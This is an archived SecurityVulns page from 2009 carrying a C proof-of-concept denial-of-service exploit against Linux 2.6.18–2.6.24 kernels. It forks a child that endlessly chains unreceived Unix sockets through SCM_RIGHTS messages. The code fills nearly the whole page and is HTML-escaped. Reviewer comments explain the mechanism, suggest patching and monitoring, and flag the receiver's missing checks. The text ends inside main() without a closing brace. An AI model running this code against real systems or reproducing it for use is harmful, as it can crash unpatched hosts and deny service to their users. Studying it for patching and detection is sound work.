SECURITYVULNS:DOC:21101 (securityvulns)
Jan 04, 2009 - 12:00 a.m.

Linux Kernel 2.6.18/2.6.24/2.6.20/2.6.22/2.6.21 denial of service exploit


/*
Linux Kernel 2.6.18/2.6.24/2.6.20/2.6.22/2.6.21 denial of service exploit

Author : Adurit Team
>> djekmani4ever

Home : www.hightsec.com

greetz : adurit team - v4-team - Zigma - stack - Mr.safa7 - king sabri - alphanix - and all my friends

note : this code for education :)
*/

#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>
#include <assert.h>
#include <err.h>
#include <stdlib.h>

/*
 * own_child - fork a helper that keeps passing socket descriptors through
 * other sockets.
 *
 * us: AF_UNIX socketpair created by the caller. After the fork the parent
 *     keeps us[0] and the child keeps us[1].
 *
 * Returns the child's pid in the parent. The child never returns: its loop
 * has no exit other than err()/errx() on a failed call.
 *
 * Each pass of the child loop creates a fresh socketpair, sends one end
 * (s[0]) as SCM_RIGHTS ancillary data over the current us[1], closes its own
 * copies of s[0] and of the old us[1], and carries on with s[1]. From the
 * second pass on, the peer of the sending socket is a descriptor that was
 * itself sent in the previous pass, so every pass queues one more socket
 * inside the receive queue of the previous one. Nothing in this function
 * receives any of them.
 *
 * NOTE(review): the page labels this only as a denial of service against the
 * listed 2.6.x kernels. Presumably the cost is on the kernel side, in
 * tracking or tearing down that nested chain of in-flight descriptors;
 * confirm against the vendor advisory for the kernel in use. For defenders:
 * run a kernel carrying the fix for the listed versions, and treat a process
 * that repeats socketpair()/sendmsg(SCM_RIGHTS)/close() in a tight loop with
 * no matching recvmsg() as an anomaly worth alerting on.
 *
 * NOTE(review): parentheses, quotes, '&' and '>' appear as HTML entities
 * below because of the hosting page's escaping.
 */
static int own_child(int *us)
{
int pid;
int s[2];
struct msghdr mh;
char crap[1024];	/* control-message buffer; a plain char array, so its alignment for struct cmsghdr is not guaranteed */
struct iovec iov;
struct cmsghdr *c;
int *fd;
int rc;

    pid = fork&#40;&#41;;
    if &#40;pid == -1&#41;
            err&#40;1, &quot;fork&#40;&#41;&quot;&#41;;

    /* Parent: drop the sending end and hand the child's pid back. */
    if &#40;pid&#41; {
          close&#40;us[1]&#41;;

            return pid;
    }

    /* Child from here on: it only ever sends, so the receiving end goes. */
    close&#40;us[0]&#41;;

    /* One byte of ordinary payload; the descriptor travels as ancillary data. */
    memset&#40;&amp;mh, 0, sizeof&#40;mh&#41;&#41;;
    iov.iov_base = &quot;a&quot;;
    iov.iov_len  = 1;

    mh.msg_iov        = &amp;iov;
    mh.msg_iovlen     = 1;
    mh.msg_control    = crap;
    mh.msg_controllen = sizeof&#40;crap&#41;;

    c = CMSG_FIRSTHDR&#40;&amp;mh&#41;;
    assert&#40;c&#41;;

    /* A single SCM_RIGHTS control message carrying exactly one int. */
    c-&gt;cmsg_level = SOL_SOCKET;
    c-&gt;cmsg_type  = SCM_RIGHTS;

    /* fd aliases the control buffer, so the *fd store in the loop updates the message in place. */
    fd = &#40;int*&#41; CMSG_DATA&#40;c&#41;;
    assert&#40;fd&#41;;

    /* Shrink the advertised control length from the whole buffer to this one message. */
    c-&gt;cmsg_len = CMSG_LEN&#40;sizeof&#40;int&#41;&#41;;
    mh.msg_controllen = c-&gt;cmsg_len;

    while &#40;1&#41; {
            if &#40;socketpair&#40;PF_UNIX, SOCK_STREAM, 0, s&#41; == -1&#41;
                    err&#40;1, &quot;socketpair&#40;&#41;&quot;&#41;;

            /* Send one end of the new pair over the current socket. */
            *fd = s[0];

            rc = sendmsg&#40;us[1], &amp;mh, 0&#41;;
            if &#40;rc == -1&#41;
                    err&#40;1, &quot;sendmsg&#40;&#41;&quot;&#41;;

            /* int compared with size_t; rc is not -1 here because of the check above. */
            if &#40;rc != iov.iov_len&#41;
                    errx&#40;1, &quot;sent short&quot;&#41;;

            /*
             * Close both local descriptors involved in the send and
             * continue on the other end of the new pair. The child's open
             * descriptor count stays flat while the number of queued,
             * unreceived sockets grows by one per pass.
             */
            close&#40;s[0]&#41;;
            close&#40;us[1]&#41;;
            us[1] = s[1];
    }

}

/*
 * own - start the helper on first use, then receive one descriptor from it
 * and install that descriptor as the new us[0].
 *
 * pid and us are function-static, so the socketpair and the fork happen only
 * while pid is still 0. The visible main() calls this once and then exits.
 *
 * Terminates the process through err()/errx() if recvmsg() fails or reports
 * EOF; the remaining checks are assert()s.
 *
 * NOTE(review): as a receiver of SCM_RIGHTS data this is not a pattern to
 * copy. It never checks cmsg_level, cmsg_len, or MSG_CTRUNC in mh.msg_flags
 * before reading through CMSG_DATA(), and the assert()s are compiled out
 * when NDEBUG is defined.
 */
static void own(void)
{
static int pid;
static int us[2];
char crap[1024];	/* receive buffer for ancillary data */
char morte[1024];	/* receive buffer for the ordinary payload */
struct cmsghdr *c;
int rc;
struct msghdr mh;
struct iovec iov;
int *fds;

    /* First call only: create the pair and fork the sender. */
    if &#40;!pid&#41; {
            if &#40;socketpair&#40;PF_UNIX, SOCK_STREAM, 0, us&#41; == -1&#41;
                    err&#40;1, &quot;socketpair&#40;&#41;&quot;&#41;;
            pid = own_child&#40;us&#41;;
    }

    iov.iov_base = morte;
    iov.iov_len  = sizeof&#40;morte&#41;;

    memset&#40;&amp;mh, 0, sizeof&#40;mh&#41;&#41;;
    mh.msg_iov        = &amp;iov;
    mh.msg_iovlen     = 1;
    mh.msg_control    = crap;
    mh.msg_controllen = sizeof&#40;crap&#41;;

    /* A single receive; later descriptors sent by the child are not read here. */
    rc = recvmsg&#40;us[0], &amp;mh, 0&#41;;
    if &#40;rc == -1&#41;
            err&#40;1, &quot;recvmsg&#40;&#41;&quot;&#41;;

    if &#40;rc == 0&#41;
            errx&#40;1, &quot;EOF&quot;&#41;;

    /* Only the message type is checked before the payload is trusted. */
    c = CMSG_FIRSTHDR&#40;&amp;mh&#41;;
    assert&#40;c&#41;;
    assert&#40;c-&gt;cmsg_type == SCM_RIGHTS&#41;;

    fds = &#40;int*&#41; CMSG_DATA&#40;c&#41;;
    assert&#40;fds&#41;;

    /* Replace the old receiving end with the descriptor that just arrived. */
    close&#40;us[0]&#41;;
    us[0] = *fds;

}

int main(int argc, char *argv[])
{
own();
exit(0);